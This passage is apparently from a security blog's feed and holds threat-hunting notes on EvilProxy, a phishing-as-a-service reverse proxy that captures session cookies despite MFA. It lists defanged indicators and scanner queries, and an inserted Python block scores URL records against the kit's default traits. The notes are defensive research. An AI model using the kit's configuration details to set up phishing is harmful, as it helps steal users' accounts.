I did see some specific assembly instructions that I wrote yara rules for, but they only came back with the files that I already had.</div><div><br /></div><h2 style="text-align: left;">Links:</h2><div><a href="https://www.virustotal.com/gui/file/8cd16feb7318c0de3027894323a0ccaacb527e071aa4c4b691feb411b6bd0937/details">https://www.virustotal.com/gui/file/8cd16feb7318c0de3027894323a0ccaacb527e071aa4c4b691feb411b6bd0937/details</a></div><div><br /></div><div><a href="https://www.virustotal.com/gui/file/40da2329b2b81f237fc30d2274529e6fda4364516b78b4b88659c572fbc4bc02/details">https://www.virustotal.com/gui/file/40da2329b2b81f237fc30d2274529e6fda4364516b78b4b88659c572fbc4bc02/details</a></div><div><br /></div><div><a href="https://www.virustotal.com/gui/file/4e5e42b1acb0c683963caf321167f6985e553af2c70f5b87ec07cc4a8c09b4d8/details">https://www.virustotal.com/gui/file/4e5e42b1acb0c683963caf321167f6985e553af2c70f5b87ec07cc4a8c09b4d8/details</a></div><div><br /></div><div><a href="https://twitter.com/r3dbU7z/status/1588337205595951106">https://twitter.com/r3dbU7z/status/1588337205595951106</a> </div><div><br /></div><div><a href="https://twitter.com/1ZRR4H/status/1588398704913895425">https://twitter.com/1ZRR4H/status/1588398704913895425</a> </div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-76356664522371948732022-11-21T13:35:00.002-08:002022-11-21T13:35:49.326-08:00Looking for EvilProxy - Notes<h2 style="text-align: left;"><b>Introduction:</b></h2><p>This started with someone asking about EvilProxy and any signatures for detecting it. </p><p>EvilProxy is a phishing-as-a-service (PhaaS) offering that can be used to capture credentials and session cookies from a user's authentication, and it also works when MFA is enabled. 
It's essentially a reverse proxy that captures information for the attacker when you authenticate or start a session on the service it is reverse-proxying.</p><p>More information can be found here: <a href="https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web">https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web</a></p><p>Similar projects include evilginx, modlishka, and muraena.</p><p><br /></p><p>Usually for an http/https traffic signature, we may want to look for the <b>status code, post/get parameters & patterns, URI pattern, JA3/JA3S, cert properties, html properties/body, etc</b>. </p><p>Here's an example for evilginx:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiktQeb8Oa2eKfBhZNYBtkbJm4aSpXM852cHSjC3SX5xikaLorQXOlUXzaIY_kXy4zVYOFf4pGDNultKNWY4qwKKRB0P6mIQK6JVPXiK_16b9Tl7Hpzsyj6PjwUzoJ2MiiiW6OMIP5uG9OMRn3eId5g4sQdvGD75Si6qvs9NdeXvfWFXkYN2eNi01l7" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="478" data-original-width="1522" height="169" src="https://blogger.googleusercontent.com/img/a/AVvXsEiktQeb8Oa2eKfBhZNYBtkbJm4aSpXM852cHSjC3SX5xikaLorQXOlUXzaIY_kXy4zVYOFf4pGDNultKNWY4qwKKRB0P6mIQK6JVPXiK_16b9Tl7Hpzsyj6PjwUzoJ2MiiiW6OMIP5uG9OMRn3eId5g4sQdvGD75Si6qvs9NdeXvfWFXkYN2eNi01l7=w543-h169" width="543" /></a></div><br /><a href="https://github.com/kgretzky/evilginx2/blob/master/core/certdb.go#L400">https://github.com/kgretzky/evilginx2/blob/master/core/certdb.go#L400</a><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh1S6oiFleXnUehBzIVJY7RpPvJv5AlFt_fdheCCneCzafR1K7w78d17DCHZpzcROJU1CInLIlQWhqElJMjuMZsGbWUMZF37-r6t258-1eWDj3Oai_ilw6FL-ItYOrnl5xHH6iUU_5UnLWZ6FPckVQUU4t0eBN2Pqo9Zo0OqXj9n9OySWTiNCo0N3TB" style="margin-left: 1em; margin-right: 1em;"><img alt="" 
data-original-height="532" data-original-width="828" height="206" src="https://blogger.googleusercontent.com/img/a/AVvXsEh1S6oiFleXnUehBzIVJY7RpPvJv5AlFt_fdheCCneCzafR1K7w78d17DCHZpzcROJU1CInLIlQWhqElJMjuMZsGbWUMZF37-r6t258-1eWDj3Oai_ilw6FL-ItYOrnl5xHH6iUU_5UnLWZ6FPckVQUU4t0eBN2Pqo9Zo0OqXj9n9OySWTiNCo0N3TB" width="320" /></a></div><p><a href="https://twitter.com/malwrhunterteam/status/1354039003121647624">https://twitter.com/malwrhunterteam/status/1354039003121647624</a></p><br /><p></p><p>There can be multiple types of detections as well. For example, <b>detection of a service by utilizing scanning/scan responses</b> (shodan/censys) and <b>detection from traffic monitoring</b> (zeek extracting cert info and logging).</p><p><br /></p><p>In this post, I'm just documenting methods and what I've found while researching EvilProxy. I don't have anything conclusive, and from screenshots/videos EvilProxy looks pretty thought-out, and I'm sure it's easy for the devs to change behavior. They let you customize pretty much everything.</p><h2 style="text-align: left;"><b>Notes:</b></h2><p>Looking at the video shared by Resecurity, I see the following:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjG9axdxNf3vL2os6pPuq4wlW-uWd00APIuNXgmUbJzc7oTMlP3SQkp8X_-7oP8KRnTOYzWEHdLzg0dY46zemudSPTAggRdxjA1PsoJGxMgBFD4jZbKmvne94CXGQXpGxKHHCwT1rMShtucVUsYv5wMbnoRKuyuAdilfyrZQhKwN42-bSZeUTi4C6q8" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="288" data-original-width="712" height="129" src="https://blogger.googleusercontent.com/img/a/AVvXsEjG9axdxNf3vL2os6pPuq4wlW-uWd00APIuNXgmUbJzc7oTMlP3SQkp8X_-7oP8KRnTOYzWEHdLzg0dY46zemudSPTAggRdxjA1PsoJGxMgBFD4jZbKmvne94CXGQXpGxKHHCwT1rMShtucVUsYv5wMbnoRKuyuAdilfyrZQhKwN42-bSZeUTi4C6q8" width="320" /></a></div><br />The subdomain is set to lmo by default. 
<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhK_YmiJkujTCyt7ZOVAjl56ZwyQmjym4tXmRXiiAZn01NEOENwV8adtRhujH16amR-2L0Ah_5jTTY5MMCWl49o-NLIvCliKMgjQXEdQSCfUn33IrGbVsq33UOZonfvQKN969L41Go6j2Pvy8iQj31GLwRlvLAegp0ExzXEPeink1Par0Bkepsor55A" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="572" data-original-width="746" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhK_YmiJkujTCyt7ZOVAjl56ZwyQmjym4tXmRXiiAZn01NEOENwV8adtRhujH16amR-2L0Ah_5jTTY5MMCWl49o-NLIvCliKMgjQXEdQSCfUn33IrGbVsq33UOZonfvQKN969L41Go6j2Pvy8iQj31GLwRlvLAegp0ExzXEPeink1Par0Bkepsor55A" width="313" /></a></div><br />Stream BotGuard redirects to brave.com by default. Later on there are also redirects to example.com and office.com.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEht1DUd2sTeBo3O9GEXai50oXBtLbcQl65Xaa7_AmhF9WzPbbL7fCeE-0KeC2xbpd3vut6Qrl2jtMRgoo5d1TkCIPAmgJBVEM5sAGHVAy5GO4oytpZsEUPEL7uf5kEucoAZB7zwj9JE62h6faEZuuGXj25f6qawHNYmdVYJWQnjgGw2Zxx_8FnsCsJr" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1256" data-original-width="2876" height="140" src="https://blogger.googleusercontent.com/img/a/AVvXsEht1DUd2sTeBo3O9GEXai50oXBtLbcQl65Xaa7_AmhF9WzPbbL7fCeE-0KeC2xbpd3vut6Qrl2jtMRgoo5d1TkCIPAmgJBVEM5sAGHVAy5GO4oytpZsEUPEL7uf5kEucoAZB7zwj9JE62h6faEZuuGXj25f6qawHNYmdVYJWQnjgGw2Zxx_8FnsCsJr" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi6bOGZ6hmXEqEW_I7u0zP4ixZMbuFTd35TUCcStVwHfNk1LHb-8_6btTIRuSOlES2XFDArciOvW7XU8ZFQm0ABqhi0eYTXoaMZmhEBfQdlz31esuxZVO1vhE5rIWKdpzuQnxWnHkhQXfF29rGun8X69IaSHPoiQEsJq2JP6y-mo6kDkH7h8V1JD0ms" style="margin-left: 1em; margin-right: 1em;"><img alt="" 
data-original-height="392" data-original-width="1792" height="96" src="https://blogger.googleusercontent.com/img/a/AVvXsEi6bOGZ6hmXEqEW_I7u0zP4ixZMbuFTd35TUCcStVwHfNk1LHb-8_6btTIRuSOlES2XFDArciOvW7XU8ZFQm0ABqhi0eYTXoaMZmhEBfQdlz31esuxZVO1vhE5rIWKdpzuQnxWnHkhQXfF29rGun8X69IaSHPoiQEsJq2JP6y-mo6kDkH7h8V1JD0ms=w438-h96" width="438" /></a></div><br /></div>The URL GET query can have username=email@example.com, but that seems optional.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjjqAUQMhRnPGZf1UoqeAaI9-9w_CZqsUw-POtvX_FSU-pkHy1L038ZG590U81qiUCj36cSpAtvuVfKLzc78Gy6hoWy1LQttj0bgQfiiMxd1YLLH_hwepymqbMWo88ynAC2XVD-FLpqjfvq58Srn_jmuPCCgX749Y3kzIuTFVLe07uPevjpvlbmdOSZ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="616" data-original-width="2088" height="94" src="https://blogger.googleusercontent.com/img/a/AVvXsEjjqAUQMhRnPGZf1UoqeAaI9-9w_CZqsUw-POtvX_FSU-pkHy1L038ZG590U81qiUCj36cSpAtvuVfKLzc78Gy6hoWy1LQttj0bgQfiiMxd1YLLH_hwepymqbMWo88ynAC2XVD-FLpqjfvq58Srn_jmuPCCgX749Y3kzIuTFVLe07uPevjpvlbmdOSZ" width="320" /></a></div><p>A URL with eqp=base64_email_address is also supported.</p><p></p><p><br /></p><p>Some of the interesting IOCs listed by Resecurity are:</p><p></p><ul style="text-align: left;"><li>147[.]78[.]47[.]250</li><li>185[.]158[.]251[.]169</li><li>194[.]76[.]226[.]166</li><li>msdnmail[.]net</li><li>evilproxy[.]pro</li><li>top-cyber[.]club</li><li>rproxy[.]io</li><li>login-live.rproxy[.]io</li></ul><p></p><p>The other IOC comes from ThreatInsight/Proofpoint posting a domain and attributing it to the EvilProxy phishing kit:</p><p></p><ul style="text-align: left;"><li>hxxps://auth[.]royalqueenelizabeth[.]com/?</li></ul><div><br /></div><h3 style="text-align: left;"><b>Status Code:</b></h3><p></p><p>Searching for some of the IPs on Shodan and viewing the history shows this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEiP0UISQHP2T4pKbB9snqCeg5Cmnkitecrqvv7YacfXNSJYCx-3t03nIuFDsxvYDB53mmHCPTlpF0VDk-vDGLBvWab4jqtiyVYxg2DA7RratFft8RLgx3LZm5d-WTHxNj-6F8ofxt_7ceGrAveUa4si6MkncFccr9sgq3hZD_thj8_lKr5zMaCDbb-6" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="872" data-original-width="890" height="275" src="https://blogger.googleusercontent.com/img/a/AVvXsEiP0UISQHP2T4pKbB9snqCeg5Cmnkitecrqvv7YacfXNSJYCx-3t03nIuFDsxvYDB53mmHCPTlpF0VDk-vDGLBvWab4jqtiyVYxg2DA7RratFft8RLgx3LZm5d-WTHxNj-6F8ofxt_7ceGrAveUa4si6MkncFccr9sgq3hZD_thj8_lKr5zMaCDbb-6=w281-h275" width="281" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiIuwcJBTP0Cc2L3MXX5sQFRF1lMynJHIWvQvlZ_RdgDlaVVyJGMOHBJl_AMjbxnNZ35738KGbG6jGAJJUOrD6r21qHMuMK6GEz28amvrUwLDF0vHv4JJ5zhds4BlZYdjSlU0jmPXx-1Nij_1yGpRiuY4XVoXHjsyQUNsa1-j9PV1VcXzQ2yAnuMUIx" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="854" data-original-width="932" height="259" src="https://blogger.googleusercontent.com/img/a/AVvXsEiIuwcJBTP0Cc2L3MXX5sQFRF1lMynJHIWvQvlZ_RdgDlaVVyJGMOHBJl_AMjbxnNZ35738KGbG6jGAJJUOrD6r21qHMuMK6GEz28amvrUwLDF0vHv4JJ5zhds4BlZYdjSlU0jmPXx-1Nij_1yGpRiuY4XVoXHjsyQUNsa1-j9PV1VcXzQ2yAnuMUIx=w283-h259" width="283" /></a></div><br />Looking at webpage scan runs on Anyrun shows this:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi6MZMIiS_Yu1gVQmYSEJBgGMs7Pp3mIUy1ntrlQ7PfPvUPzm9TBFljIO9ovhq2jDqi7ixYVBDZ-D0poQb4SL4Rs3694ZvvvhNDTsKL_u9v8-yX0y1Dezofb3wMUJtA7TGRnZAvMPoENUHXN-R-YHIHsHHfEJL-EAPK6Gv3jim_O3iHMzFVpfuwWDFf" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="926" data-original-width="1062" height="240" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEi6MZMIiS_Yu1gVQmYSEJBgGMs7Pp3mIUy1ntrlQ7PfPvUPzm9TBFljIO9ovhq2jDqi7ixYVBDZ-D0poQb4SL4Rs3694ZvvvhNDTsKL_u9v8-yX0y1Dezofb3wMUJtA7TGRnZAvMPoENUHXN-R-YHIHsHHfEJL-EAPK6Gv3jim_O3iHMzFVpfuwWDFf" width="275" /></a></div><br />This is what URLScan shows as well:<div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgtNnRg_5jtMgPIlPd6TS-rVrzvfGEqbc5svsPWHW_N6AD1VXzLEdUdm2YI4eq1_UW3FEDVB9QezV0LndmXSQgBpg1llJXSXxXmCunjQJ-bReXndk21iHw2cgEZQBcVs5o_f2nd9sjhDHNebAIH0W8R_VDVJVEY5VCVWo-LPNoSbWgr0LAlEUDBBgP0" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1064" data-original-width="1934" height="301" src="https://blogger.googleusercontent.com/img/a/AVvXsEgtNnRg_5jtMgPIlPd6TS-rVrzvfGEqbc5svsPWHW_N6AD1VXzLEdUdm2YI4eq1_UW3FEDVB9QezV0LndmXSQgBpg1llJXSXxXmCunjQJ-bReXndk21iHw2cgEZQBcVs5o_f2nd9sjhDHNebAIH0W8R_VDVJVEY5VCVWo-LPNoSbWgr0LAlEUDBBgP0=w549-h301" width="549" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgHBeRHEQMMOtkLaK9wbipOko30qkgX0pA2PcpJoHUaRq18DmyWODj5WgdzgpUEChgCerPlmx6QAO0CjmpzVVEJmQtYIRJEDZJ6qhDEneXZJsXek-M5u2vxnn3Kjk4wVGUBJN5R6kPlgg1uesjBaR7cjCnFmXJSG1HsMeMOGyN1oyiNOa-cvDDOOBIl" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="240" data-original-width="459" height="230" src="https://blogger.googleusercontent.com/img/a/AVvXsEgHBeRHEQMMOtkLaK9wbipOko30qkgX0pA2PcpJoHUaRq18DmyWODj5WgdzgpUEChgCerPlmx6QAO0CjmpzVVEJmQtYIRJEDZJ6qhDEneXZJsXek-M5u2vxnn3Kjk4wVGUBJN5R6kPlgg1uesjBaR7cjCnFmXJSG1HsMeMOGyN1oyiNOa-cvDDOOBIl=w440-h230" width="440" /></a></div></div><br /><br /><div>Maybe we can look for servers being used for EvilProxy phishing sites by looking for "444 Unknown 
Status Code"?<p></p><p><b>Censys Query</b>: (services.http.response.status_code:444 and services.http.response.status_reason:"Unknown Status Code") and services.software.vendor=`nginx`</p><p><b>Shodan Query</b>: http.status:444 "Unknown Status Code" "nginx"</p><p><b>URLScan Query</b>: page.status:444 AND server:"nginx"</p>Shodan & Censys: out of 5 and 4 results respectively, 2 IPs were publicly known for phishing.<div><br /></div><div>URLScan showed a ton of data, and it's easy to tell from the domain & subdomain names which sites are phishing:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjojsNkvRErnUMPlJ7Abdk-VcwBWLS9nZufhH1PgOLjKeFwVPd-V7vSYVMiURVjd7Mj37K7_WN7URbM-T1CsPS2eMpPaeS0kEOe0sR0Uibp73ytHefSqYiratYj8XKuYqoU24ZaGWEb4tbxvGmxDDXneS6BJvnKR1p_IwL08Fu-HeoakcUlMxvTzwUm" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1208" data-original-width="1200" height="405" src="https://blogger.googleusercontent.com/img/a/AVvXsEjojsNkvRErnUMPlJ7Abdk-VcwBWLS9nZufhH1PgOLjKeFwVPd-V7vSYVMiURVjd7Mj37K7_WN7URbM-T1CsPS2eMpPaeS0kEOe0sR0Uibp73ytHefSqYiratYj8XKuYqoU24ZaGWEb4tbxvGmxDDXneS6BJvnKR1p_IwL08Fu-HeoakcUlMxvTzwUm=w403-h405" width="403" /></a></div><br />The 444 search approach works fine, but it doesn't seem to be very accurate when it comes to Shodan and Censys. It's much more useful when looking at URLScan though. </div><div><br /></div><div>Also, 444 doesn't show up for everything. It may have shown up for some of the domains due to misconfiguration, possibly? I don't know.</div><h3 style="text-align: left;">Subdomain name:</h3><div>The other approach for finding EvilProxy domains could be using subdomain names (maybe with additional queries). 
This will likely have false positives, and since EvilProxy offers a lot of configuration options, if the user changed the default settings you wouldn't have much success.</div><div><br /></div><div>Some of the subdomain names EvilProxy has used are (based on VT & videos): lmo (microsoft), auth, login-live, wwwofc, accounts (google), mso (microsoft), github (github).</div><div><p></p><p>URLScan can be queried with: page.domain:(login-live.* OR accounts.* OR lmo.* OR auth.* OR wwwofc.* OR mso.* OR github.*) but github, auth, and accounts might lead to false positives.</p><p>This might be much better: page.domain:(login-live.* OR lmo.* OR wwwofc.* OR mso.*)</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgfIIx-f6gENYIWsL1vliZy4wSNh3Fv-LKDOWwu5OrCikB3Sl1KYrpRIL6tWRZzKGj_zpnkioFyxp9mRRVp0r-Lc9jFwnt99WViB9LgnWLUpwpWXVhdRyGrFJ1EIq6bUb_1G6RXEF2qaqqQrFX_5CaUTA_eSIXU1BTP9doiWHiPIMkAOFErLgy1QjBS" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1106" data-original-width="1326" height="330" src="https://blogger.googleusercontent.com/img/a/AVvXsEgfIIx-f6gENYIWsL1vliZy4wSNh3Fv-LKDOWwu5OrCikB3Sl1KYrpRIL6tWRZzKGj_zpnkioFyxp9mRRVp0r-Lc9jFwnt99WViB9LgnWLUpwpWXVhdRyGrFJ1EIq6bUb_1G6RXEF2qaqqQrFX_5CaUTA_eSIXU1BTP9doiWHiPIMkAOFErLgy1QjBS=w397-h330" width="397" /></a></div><br /><a href="http://Crt.sh">Crt.sh</a> can also be searched for certs issued for some of the subdomains; however, that may not work very well since it looks like wildcard certs were issued in the past.<p></p><h3 style="text-align: left;">URL parameters/pattern:</h3><p>One of the things we see above (in the urlscan screenshot) and in the ThreatInsight/Proofpoint example is a question mark '?' at the end of the URL. That could be searched for. Additionally, username= or eqp= can be searched for. Searching for /? and username= will lead to a lot of false positives. 
The search could be combined with some of the URLScan queries to potentially get fewer false positives.</p><p>The URLScan query would look like this: page.url:"/?eqp=" NOT page.domain:ups.com</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg42Ap4MfGHKgmS9MP87XbMKhUYAQFQiB_SdyH0wxfMMPJMndFD3IwHyftOkUtYYr4L6_cfKAoGVZ1JZ6ghZh3b8AGW2jA9XfkWXTqTFPD0mP7EXNA_yovFdmKNt_sNOFTWG2usoRAWfxRMCwDwmOzAzDHb6GoD6CJUGfp-EmaBCOwH3SBKBNImlohr" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1424" data-original-width="842" height="433" src="https://blogger.googleusercontent.com/img/a/AVvXsEg42Ap4MfGHKgmS9MP87XbMKhUYAQFQiB_SdyH0wxfMMPJMndFD3IwHyftOkUtYYr4L6_cfKAoGVZ1JZ6ghZh3b8AGW2jA9XfkWXTqTFPD0mP7EXNA_yovFdmKNt_sNOFTWG2usoRAWfxRMCwDwmOzAzDHb6GoD6CJUGfp-EmaBCOwH3SBKBNImlohr=w256-h433" width="256" /></a></div><br />It kinda shows some malicious sites with some false positives. Also, this search doesn't produce many results. At the time of writing, there were only 49 results.<p></p><p>Again, since EvilProxy is customizable, the parameters can be changed by the user. </p><h3 style="text-align: left;">Redirects:</h3><p>From the streams feature that was shown in the video, EvilProxy can perform actions such as redirects based on rules regarding the traffic source. Some of the defaults included brave.com, google.com and example.com. I'm sure other configuration settings include more redirections.</p><p>The only problem with this is that many sites might be doing these redirects, including other phishing kits, so this doesn't mean the source site is EvilProxy. 
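To show how the individually weak hints above (444 + nginx, the default subdomain labels, the eqp=/username= and trailing-'?' URL patterns, and the default redirect targets) become more useful in combination, here is an added example that is not code from this post or from EvilProxy: it scores simplified urlscan-style records and reports only those where several hints agree. The record shape, the weights and the threshold are assumptions made for this example.

```python
"""Combine the weak EvilProxy hunting hints from the post into one score."""
import base64
import binascii
from urllib.parse import parse_qs, urlsplit

# Sub-domain labels the post attributes to EvilProxy defaults: STRONG_LABELS is
# the post's "much better" query, WEAK_LABELS the ones it flags as FP-prone.
STRONG_LABELS = {"login-live", "lmo", "wwwofc", "mso"}
WEAK_LABELS = {"auth", "accounts", "github"}
# Default redirect destinations mentioned in the post.
REDIRECT_TARGETS = {"brave.com", "google.com", "example.com", "office.com"}
# Weights and threshold are assumptions made for this example, not post values.
WEIGHTS = {
    "status_444_nginx": 2,
    "default_subdomain": 2,
    "victim_parameter": 2,
    "generic_subdomain": 1,
    "trailing_question_mark": 1,
    "default_redirect": 1,
}
THRESHOLD = 4


def _host_matches(hostname, targets):
    """True if hostname equals one of targets or is a sub-domain of one."""
    return any(hostname == t or hostname.endswith("." + t) for t in targets)


def signals(record):
    """Return the set of hint names that fire for one record.

    record is an assumed, simplified stand-in for a urlscan result:
    {"url": str, "status": int, "server": str, "redirected_to": str | None}
    """
    parts = urlsplit(record["url"])
    host = parts.hostname or ""
    labels = host.split(".")
    hits = set()

    # nginx answering 444 "Unknown Status Code", as seen on Shodan/Censys/urlscan.
    server = (record.get("server") or "").lower()
    if record.get("status") == 444 and "nginx" in server:
        hits.add("status_444_nginx")

    # Only the left-most label counts, and only when there is a real sub-domain.
    if len(labels) > 2:
        if labels[0] in STRONG_LABELS:
            hits.add("default_subdomain")
        elif labels[0] in WEAK_LABELS:
            hits.add("generic_subdomain")

    # ?eqp=<base64 e-mail> or ?username=<e-mail> pre-fills the victim's account.
    query = parse_qs(parts.query, keep_blank_values=True)
    if "eqp" in query or "username" in query:
        hits.add("victim_parameter")
    # A bare trailing "/?" with no parameters, as in the Proofpoint IOC.
    elif record["url"].endswith("/?"):
        hits.add("trailing_question_mark")

    # Off-domain redirect to one of the kit's default destinations.
    target = record.get("redirected_to")
    if target:
        target_host = urlsplit(target).hostname or ""
        if target_host != host and _host_matches(target_host, REDIRECT_TARGETS):
            hits.add("default_redirect")
    return hits


def score(record):
    """Sum the weights of every hint that fires for the record."""
    return sum(WEIGHTS[h] for h in signals(record))


def victim_from_eqp(url):
    """Decode eqp= (base64 e-mail) so the targeted user can be warned; else None."""
    values = parse_qs(urlsplit(url).query).get("eqp")
    if not values:
        return None
    try:
        return base64.b64decode(values[0], validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def hunt(records):
    """Return (url, score, sorted hints) for every record at or above THRESHOLD."""
    out = []
    for rec in records:
        s = score(rec)
        if s >= THRESHOLD:
            out.append((rec["url"], s, sorted(signals(rec))))
    return out


# Constructed sample records (not real urlscan data) exercising the hints above.
SAMPLE_RECORDS = [
    {"url": "https://lmo.phish-kit.test/?eqp=dXNlckBleGFtcGxlLmNvbQ==", "status": 444, "server": "nginx", "redirected_to": None},
    {"url": "https://www.ups.com/?", "status": 200, "server": "nginx", "redirected_to": None},
    {"url": "https://accounts.legit-corp.test/login", "status": 200, "server": "nginx", "redirected_to": "https://www.google.com/"},
    {"url": "https://login-live.phish-kit.test/?", "status": 200, "server": "nginx", "redirected_to": "https://brave.com/"},
]
```

Running hunt(SAMPLE_RECORDS) flags only the first and last record; the ups.com "/?" hit and the accounts.* site that redirects to google.com stay below the threshold, which is the false-positive behaviour the post describes.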
The previous query for default subdomains can be combined to potentially get better results.</p><p>In URLScan this query provides results for any redirects to brave.com: page.redirected:off-domain AND ("brave.com") AND task.url:(login-live.* OR lmo.* OR wwwofc.* OR mso.*)</p><h3 style="text-align: left;">HTML Body:</h3><p>One of the things I noticed while doing the following query: page.redirected:off-domain AND page.domain:(login-live.* OR lmo.* OR wwwofc.* OR mso.*) is that some of the screenshots for malicious websites look like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjv7ndYwifvg7dxqWkEGO9NYFDIe2fqEL4XjwmNpGhGDBzJGzo9HWTiu4xmBGS7APNxow1Y5SUH4MYa_iLlbRoa_EOgNA5iuSV3kNMnG3-01ISMBRMOMfrgAgDTcJ6usv1jTDN36kKKwALMKhVGdnxtMoiUmFUB9d5zg0H7WfmGQQLMoef1kKgYV78B" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="360" data-original-width="1880" height="123" src="https://blogger.googleusercontent.com/img/a/AVvXsEjv7ndYwifvg7dxqWkEGO9NYFDIe2fqEL4XjwmNpGhGDBzJGzo9HWTiu4xmBGS7APNxow1Y5SUH4MYa_iLlbRoa_EOgNA5iuSV3kNMnG3-01ISMBRMOMfrgAgDTcJ6usv1jTDN36kKKwALMKhVGdnxtMoiUmFUB9d5zg0H7WfmGQQLMoef1kKgYV78B=w643-h123" width="643" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj-y1lh2LM_OB0C4n1Mcj7qCrLmRLj9twcV_Rz1vJLxQWzlb3wkseTxStd7FMVAHYDw_p8zGekNkD5YnUwbMVLTuw-rkRsu1KQB5reA80gl-NpYegj8cyUe-iUcr-l_z-AOgfgPQ4pq6PUJa5Jz-lE-zEwoG_j7JbhuHnPF2UYpcIh-NvdsyM1KN9OE" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="684" data-original-width="1474" height="222" src="https://blogger.googleusercontent.com/img/a/AVvXsEj-y1lh2LM_OB0C4n1Mcj7qCrLmRLj9twcV_Rz1vJLxQWzlb3wkseTxStd7FMVAHYDw_p8zGekNkD5YnUwbMVLTuw-rkRsu1KQB5reA80gl-NpYegj8cyUe-iUcr-l_z-AOgfgPQ4pq6PUJa5Jz-lE-zEwoG_j7JbhuHnPF2UYpcIh-NvdsyM1KN9OE=w480-h222" width="480" /></a></div><br 
/><p></p><p>This results from some javascript which can be found here: <a href="https://urlscan.io/responses/e85dcff15d140f96a949d9a186c44edb2723e90073bc902d5e278ecad0d1661a/">https://urlscan.io/responses/e85dcff15d140f96a949d9a186c44edb2723e90073bc902d5e278ecad0d1661a/</a> </p><p>I didn't spend too much time researching it but it looks like it may be trying to do fingerprinting. Some of the things in the javascript show up here: <a href="https://github.com/fingerprintjs/fingerprintjs/blob/master/src/sources/dom_blockers.ts">https://github.com/fingerprintjs/fingerprintjs/blob/master/src/sources/dom_blockers.ts</a> </p><p>Searching for javascript code that does fingerprinting in network traffic or on URLScan might be useful for hunting, however, I'd assume other people are using javascript to fingerprint so it might not always be useful.</p><p>The code kinda looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgaYxMs6VykskkII7JMFw-o2gFIACvilaH3jDu3Cv-rwX_OknB3wsZSrdFEqap3kuYrG0YHQ7IHg7SPkX4YIdmZUY-9i0XIhpnWl22ClKtFUqlzf38yGSSQUmVAHDvN2TspxDGJdpQQ8Ue83PRHtshBXaVVaI_PdVPAfhDnBadSZX7ugaiAv8PeKBLO" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="252" data-original-width="606" height="133" src="https://blogger.googleusercontent.com/img/a/AVvXsEgaYxMs6VykskkII7JMFw-o2gFIACvilaH3jDu3Cv-rwX_OknB3wsZSrdFEqap3kuYrG0YHQ7IHg7SPkX4YIdmZUY-9i0XIhpnWl22ClKtFUqlzf38yGSSQUmVAHDvN2TspxDGJdpQQ8Ue83PRHtshBXaVVaI_PdVPAfhDnBadSZX7ugaiAv8PeKBLO" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjwIL7KYTY9HBZnfpf8Q0qZ_ao6UR9TknDV8WpxPzci3UrpRfqpIC47z1q4TQu6FgURExkEU7txg_wXFscZExymcwh0K9mmSRsHiUMd5ZZt-l6fh-YJ5SNeErDw-rK_u50eOhTQe8_DcJA8THKlj_6LE4uqgnfb3EZ_di2WZZXvMNaJXhtftBxDTbBV" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="192" 
